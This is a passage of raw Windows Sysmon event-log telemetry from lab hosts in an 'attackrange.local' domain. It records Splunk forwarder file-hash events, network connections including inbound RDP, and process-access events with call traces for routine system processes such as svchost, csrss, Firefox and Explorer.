23542300x8000000000000000980292Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:02.694{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E44D8D72008C7ACB0A2D2C6C6EE3C016,SHA256=5CBB76D8ACB779082FEFA13E2856A9340312F9167F01F39C31A83AD5B8659D43,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052095Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:02.485{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D50A8FD9987E2487BDDFA0DDA1B6E792,SHA256=8DA1B3E66706C07F3DBE88B61EC0E4400234A42DD817B2E504A512E2CC0DF741,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980293Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:03.702{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BA75BA7710A23E7BA5F49F5FD8576EF9,SHA256=6C163826F9F27A2486AD51D9DF12D18151C132798DE427A08D7CC889E347BCD0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052096Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:03.500{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E6CBED2DFE144C9450D115BBFFB28F49,SHA256=83203A3E8F7828F86EE20A77BA73EEF2EA89D59E9F63F0A0E6E9609961A27AFB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980297Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:04.936{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=EFCD30C3D6AF4FBCBBFB304CE0EE5BEC,SHA256=B309DCFB47243E0F7B32D5783EC06FBCC12BA224459B75CAE9EE598296C2F855,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980296Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:04.936{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A76F5D49CB872B0AFDADAAB9D6FF37BD,SHA256=C48960F51ED0F30CBA4EA6924F965A3E1E241DB19AFB1D8BF04ED642D7059BB4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052097Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:04.515{5EBD8912-7F53-614D-7700-00000000FC01}2312NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1242BEF7EAA6AD70D215E3CC8432C5C0,SHA256=520AAC159E562AD57860535798D40B45BFC2CF905D07200EC38147D822E45C41,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000980295Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:01.856{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59470-false10.0.1.12-8000- 354300x8000000000000000980294Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:01.819{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse13.235.255.213ec2-13-235-255-213.ap-south-1.compute.amazonaws.com51316-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 354300x8000000000000000980298Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:02.454{69CF5F33-7F28-614D-1000-00000000FD01}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse87.236.208.230-58949-false10.0.1.15win-host-542.attackrange.local3389ms-wbt-server 10341000x80000000000000001052147Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:05.857{5EBD8912-7F2F-614D-0C00-00000000FC01}8282696C:\Windows\system32\svchost.exe{5EBD8912-8C89-6151-6E7A-00000000FC01}7036C:\Windows\system32\DllHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052146Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:05.841{5EBD8912-7F2D-614D-0500-00000000FC01}408524C:\Windows\system32\csrss.exe{5EBD8912-8C89-6151-6E7A-00000000FC01}7036C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001052145Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:05.841{5EBD8912-7F2F-614D-0C00-00000000FC01}8282696C:\Windows\system32\svchost.exe{5EBD8912-8C89-6151-6E7A-00000000FC01}7036C:\Windows\system32\DllHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+366e9|c:\windows\system32\rpcss.dll+3bed2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052144Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:05.769{5EBD8912-7F2F-614D-0C00-00000000FC01}8282696C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052143Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:05.769{5EBD8912-7F2F-614D-0C00-00000000FC01}8282696C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052142Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:05.769{5EBD8912-7F2F-614D-0C00-00000000FC01}8282696C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052141Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:05.769{5EBD8912-7F2F-614D-0C00-00000000FC01}8282696C:\Windows\system32\svchost.exe{5EBD8912-7F40-614D-2D00-00000000FC01}2380C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052140Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:05.738{5EBD8912-7F2F-614D-0C00-00000000FC01}8282696C:\Windows\system32\svchost.exe{5EBD8912-7F30-614D-1600-00000000FC01}1268C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052139Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:05.738{5EBD8912-7F2F-614D-0C00-00000000FC01}8282696C:\Windows\system32\svchost.exe{5EBD8912-7F30-614D-1600-00000000FC01}1268C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052138Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:05.729{5EBD8912-7B3A-6151-3A78-00000000FC01}71204060C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37eb0|C:\Program Files\Mozilla Firefox\firefox.exe+37da6|C:\Program Files\Mozilla Firefox\firefox.exe+49380|C:\Program Files\Mozilla Firefox\firefox.exe+4907c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052137Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:05.728{5EBD8912-7B3A-6151-3A78-00000000FC01}71204060C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37eb0|C:\Program Files\Mozilla Firefox\firefox.exe+37da6|C:\Program Files\Mozilla Firefox\firefox.exe+49380|C:\Program Files\Mozilla Firefox\firefox.exe+4907c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052136Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:05.727{5EBD8912-7B3A-6151-3A78-00000000FC01}71204060C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\firefox.exe+37eb0|C:\Program Files\Mozilla Firefox\firefox.exe+37da6|C:\Program Files\Mozilla Firefox\firefox.exe+49380|C:\Program Files\Mozilla Firefox\firefox.exe+4907c|C:\Windows\SYSTEM32\ntdll.dll+7f60d|C:\Windows\SYSTEM32\ntdll.dll+3a7f0|C:\Windows\SYSTEM32\ntdll.dll+1ed03|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052135Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:05.726{5EBD8912-7B3A-6151-3A78-00000000FC01}71206336C:\Program Files\Mozilla Firefox\firefox.exe{5EBD8912-7B3D-6151-3B78-00000000FC01}6180C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1b5281|C:\Program Files\Mozilla Firefox\xul.dll+9e9474|C:\Program Files\Mozilla Firefox\xul.dll+b7d641|C:\Program Files\Mozilla Firefox\xul.dll+b59893|C:\Program Files\Mozilla Firefox\xul.dll+b59a47|C:\Program Files\Mozilla Firefox\xul.dll+b7d55f|C:\Program Files\Mozilla Firefox\xul.dll+bef0a5|C:\Program Files\Mozilla Firefox\xul.dll+bee203|C:\Program Files\Mozilla Firefox\xul.dll+bed8a1|C:\Program Files\Mozilla Firefox\xul.dll+3a7999|C:\Program Files\Mozilla Firefox\xul.dll+279796e|C:\Program Files\Mozilla Firefox\xul.dll+27989c0|C:\Program Files\Mozilla Firefox\xul.dll+2872ce7|C:\Program Files\Mozilla Firefox\xul.dll+10238a|C:\Program Files\Mozilla Firefox\xul.dll+f3f7ac|C:\Program Files\Mozilla Firefox\xul.dll+181ae32|C:\Program Files\Mozilla Firefox\xul.dll+102374|C:\Program Files\Mozilla Firefox\xul.dll+3916ae4|C:\Program Files\Mozilla Firefox\xul.dll+f3f2f6|C:\Program Files\Mozilla Firefox\xul.dll+1ab820f|C:\Program Files\Mozilla Firefox\xul.dll+f0caf6|C:\Program Files\Mozilla Firefox\xul.dll+19a2e8e 10341000x80000000000000001052134Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:05.699{5EBD8912-79C0-6151-E577-00000000FC01}42965564C:\Windows\Explorer.EXE{5EBD8912-79CC-6151-F677-00000000FC01}4344C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+15bf06|C:\Windows\System32\TwinUI.dll+83087|C:\Windows\System32\TwinUI.dll+bb7be|C:\Windows\System32\TwinUI.dll+bb789|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052133Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:05.699{5EBD8912-79C0-6151-E577-00000000FC01}42965564C:\Windows\Explorer.EXE{5EBD8912-79CC-6151-F677-00000000FC01}4344C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+15bf06|C:\Windows\System32\TwinUI.dll+83087|C:\Windows\System32\TwinUI.dll+bb7be|C:\Windows\System32\TwinUI.dll+bb789|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052132Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:05.699{5EBD8912-79C0-6151-E577-00000000FC01}42967028C:\Windows\Explorer.EXE{5EBD8912-79CB-6151-F577-00000000FC01}2124C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+15bf06|C:\Windows\System32\TwinUI.dll+83087|C:\Windows\System32\TwinUI.dll+bb7be|C:\Windows\System32\TwinUI.dll+bb789|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052131Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:05.699{5EBD8912-79C0-6151-E577-00000000FC01}42965964C:\Windows\Explorer.EXE{5EBD8912-79CB-6151-F577-00000000FC01}2124C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\system32\twinui.pcshell.dll+27c24|C:\Windows\system32\twinui.pcshell.dll+17316|C:\Windows\system32\twinui.pcshell.dll+17671|C:\Windows\system32\twinui.pcshell.dll+176a9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052130Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:05.699{5EBD8912-79C0-6151-E577-00000000FC01}42967028C:\Windows\Explorer.EXE{5EBD8912-79CB-6151-F577-00000000FC01}2124C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\System32\TwinUI.dll+15bf06|C:\Windows\System32\TwinUI.dll+83087|C:\Windows\System32\TwinUI.dll+bb7be|C:\Windows\System32\TwinUI.dll+bb789|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052129Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:05.699{5EBD8912-79C0-6151-E577-00000000FC01}42965964C:\Windows\Explorer.EXE{5EBD8912-79CB-6151-F577-00000000FC01}2124C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1dbcc|C:\Windows\SYSTEM32\twinapi.appcore.dll+1d777|C:\Windows\system32\twinui.pcshell.dll+27c24|C:\Windows\system32\twinui.pcshell.dll+17316|C:\Windows\system32\twinui.pcshell.dll+17671|C:\Windows\system32\twinui.pcshell.dll+176a9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052128Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:05.668{5EBD8912-7F2F-614D-0C00-00000000FC01}8282696C:\Windows\system32\svchost.exe{5EBD8912-8C89-6151-6C7A-00000000FC01}4396C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+163fd|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d6162|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052127Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:19:05.668{5EBD8912-7F2F-614D-0C00-00000000FC01}8282696C:\Windows\system32\svchost.exe{5EBD8912-8C89-6151-6C7A-00000000FC01}4396C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+19ab3|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052126Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 